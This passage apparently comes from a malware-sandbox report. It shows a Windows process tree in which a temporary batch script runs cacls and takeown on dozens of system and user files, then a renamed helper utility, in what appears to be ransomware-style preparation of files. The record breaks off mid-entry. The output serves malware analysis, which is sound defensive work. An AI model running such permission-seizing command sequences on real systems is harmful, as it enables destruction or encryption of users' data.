    - Modifies file permissions
    PID:3936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "background.png" -nobanner
    3⤵
    PID:2500
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "background.png" -nobanner
      4⤵
      PID:3440
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:560
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
  2⤵
  PID:1552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"
    3⤵
    - Modifies file permissions
    PID:2448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
    3⤵
    PID:2328
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
      4⤵
      PID:2832
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl""
  2⤵
  PID:2800
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" /E /G Admin:F /C
    3⤵
    PID:4000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl"
    3⤵
    - Modifies file permissions
    PID:1428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" -nobanner
    3⤵
    PID:4064
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" -nobanner
      4⤵
      PID:1516
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:1464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    - Modifies file permissions
    PID:264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:3228
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:2684
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:2596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    PID:3392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "background.png" -nobanner
    3⤵
    PID:1684
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "background.png" -nobanner
      4⤵
      PID:1404
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""
  2⤵
  PID:3372
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C
    3⤵
    PID:2892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"
    3⤵
    - Modifies file permissions
    PID:764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "StorageHealthModel.dat" -nobanner
    3⤵
    PID:3524
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "StorageHealthModel.dat" -nobanner
      4⤵
      PID:2964
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2184
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat""
  2⤵
  PID:3404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat" /E /G Admin:F /C
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat"
    3⤵
    PID:272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "75fbd12bafcbd46e_COM15.dat" -nobanner
    3⤵
    PID:2976
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "75fbd12bafcbd46e_COM15.dat" -nobanner
      4⤵
      PID:296
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl""
  2⤵
  PID:3844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" /E /G Admin:F /C
    3⤵
    PID:3760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl"
    3⤵
    - Modifies file permissions
    PID:2988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" -nobanner
    3⤵
    PID:3308
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" -nobanner
      4⤵
      PID:3804
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl""
  2⤵
  PID:1796
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" /E /G Admin:F /C
    3⤵
    PID:2500
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl"
    3⤵
    - Modifies file permissions
    PID:3696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" -nobanner
    3⤵
    PID:4088
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" -nobanner
      4⤵
      PID:3920
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4000
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:3176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    PID:3204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:2196
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:264
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2912
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:980
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    - Modifies file permissions
    PID:2104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:3440
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:3392
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:2636
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:1684
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    PID:1200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:3520
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:1428
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""
  2⤵
  PID:2964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"
    3⤵
    - Modifies file permissions
    PID:1112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
    3⤵
    PID:3416
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
      4⤵
      PID:556
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.51ff8642-04e7-4470-b125-403d204a2b3f.1.etl""
  2⤵
  PID:440
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.51ff8642-04e7-4470-b125-403d204a2b3f.1.etl" /E /G Admin:F /C
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.51ff8642-04e7-4470-b125-403d204a2b3f.1.etl"
    3⤵
    PID:1228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "NotificationUxBroker.51ff8642-04e7-4470-b125-403d204a2b3f.1.etl" -nobanner
    3⤵
    PID:3332
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "NotificationUxBroker.51ff8642-04e7-4470-b125-403d204a2b3f.1.etl" -nobanner
      4⤵
      PID:2104
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:876
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.c554354c-5d25-449b-a6b5-7968636b6069.1.etl""
  2⤵
  PID:3392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.c554354c-5d25-449b-a6b5-7968636b6069.1.etl" /E /G Admin:F /C
    3⤵
    PID:3912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.c554354c-5d25-449b-a6b5-7968636b6069.1.etl"
    3⤵
    PID:4008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "WuProvider.c554354c-5d25-449b-a6b5-7968636b6069.1.etl" -nobanner
    3⤵
    PID:996
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "WuProvider.c554354c-5d25-449b-a6b5-7968636b6069.1.etl" -nobanner
      4⤵
      PID:2892
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:764
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
  2⤵
  PID:3520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
    3⤵
    PID:4056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
    3⤵
    PID:3240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    3⤵
    PID:1096
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "OfficeIntegrator.ps1" -nobanner
      4⤵
      PID:2792
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1420
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:3944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:456
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    - Modifies file permissions
    PID:2520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:280
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:2104
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
  2⤵
  PID:2328
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
    3⤵
    PID:3808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
    3⤵
    PID:1200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
    3⤵
    PID:2892
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
      4⤵
      PID:3696
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1516
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl""
  2⤵
  PID:4064
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" /E /G Admin:F /C
    3⤵
    PID:3240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl"
    3⤵
    - Modifies file permissions
    PID:540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" -nobanner
    3⤵
    PID:1096
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" -nobanner
      4⤵
      PID:1420
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4000
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:4088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:2988
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    PID:3304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "device.png" -nobanner
    3⤵
    PID:112
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "device.png" -nobanner
      4⤵
      PID:2800
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat""
  2⤵
  PID:560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat" /E /G Admin:F /C
    3⤵
    PID:3980
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat"
    3⤵
    - Modifies file permissions
    PID:3940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "75fbd12bafcbd46e.dat" -nobanner
    3⤵
    PID:764
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "75fbd12bafcbd46e.dat" -nobanner
      4⤵
      PID:2500
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl""
  2⤵
  PID:3176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" /E /G Admin:F /C
    3⤵
    PID:3936
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl"
    3⤵
    - Modifies file permissions
    PID:2792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" -nobanner
    3⤵
    PID:1436
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" -nobanner
      4⤵
      PID:3416
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl""
  2⤵
  PID:3932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" /E /G Admin:F /C
    3⤵
    PID:3332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl"
    3⤵
    PID:3124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" -nobanner
    3⤵
    PID:2832
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" -nobanner
      4⤵
      PID:876
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl""
  2⤵
  PID:752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" /E /G Admin:F /C
    3⤵
    PID:3188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl"
    3⤵
    - Modifies file permissions
    PID:1200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" -nobanner
    3⤵
    PID:3696
